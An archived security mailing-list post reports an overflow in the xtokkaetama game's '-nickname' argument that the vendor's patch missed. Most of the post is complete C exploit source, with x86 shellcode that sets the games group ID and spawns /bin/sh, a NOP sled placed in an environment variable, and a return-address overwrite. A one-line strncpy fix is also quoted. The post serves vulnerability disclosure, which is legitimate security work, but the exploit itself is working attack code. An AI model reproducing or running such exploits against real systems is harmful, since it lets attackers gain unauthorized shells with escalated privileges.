Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: bt804.txt

xtokkaetama: (missed) buffer overflow exploit.







not a big deal, but after viewing the debian advisory for xtokkaetama; BID 

found at http://www.securityfocus.com/bid/8312.  i took a quick look at 

the source, and noticed an overlooked buffer overflow that occurs later in 

the program.  the overflow is a result of the "-nickname" command line 

argument...quick example exploit follows. (i don't have a debian box here, 

but the exploit should still work ok, tested on redhat7.1)





--------------------------- exploit: xxtama.c ---------------------------



/* (linux/x86)xtokkaetama[v1.0b+]: (games) local buffer overflow exploit.

   by: v9[v9@fakehalo.deadpig.org]. (fakehalo)



   exploits an overflow missed in the patch/upgrade of:

    http://www.securityfocus.com/bid/8312



   fix:

    xtama_score.c:132: +strncpy(name,nickname,sizeof(name)-1);

    xtama_score.c:132: -sscanf( nickname , "%s",name ) ;



   (tested on non-debian, should still work elsewhere)

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <grp.h>

#include <sys/types.h>

#define PATH "/usr/games/xtokkaetama" /* game binary. */

static char exec[]= /* setgid(?)+shell.               */

 "\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x47\xcd"

 "\x80\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56"

 "\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34"

 "\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"

 "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";

int main(){

 unsigned int i;

 char *buf;

 struct group *gent;

 printf("(*)xtokkaetama[v1.0b+]: local buffer overflow exploit.\n");

 printf("(*)by: v9@fakehalo.deadpig.org / fakehalo.\n\n");

 if(!(buf=(char *)malloc(16384+1)))exit(1);

 memset(buf,0x90,(16384-strlen(exec)));

 if(!(gent=getgrnam("games")))exec[5]=exec[7]=20;

 else{exec[5]=exec[7]=gent->gr_gid;}

 strcat(buf,exec);

 setenv("EXEC",buf,1);

 memset(buf,0x0,(16384+1));

 for(i=0;i<512;i+=4){*(long *)&buf[i]=0xbfffe001;} 

 printf("[*] in the game, hit: spacebar, \"Q\", spacebar, spacebar.\n");

 sleep(3);

 printf("[*] entering xtokkaetama...\n");

 if(execlp(PATH,PATH,"-nickname",buf,0))

  printf("[!] failed to execute %s.\n",PATH);

 exit(0);

}



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH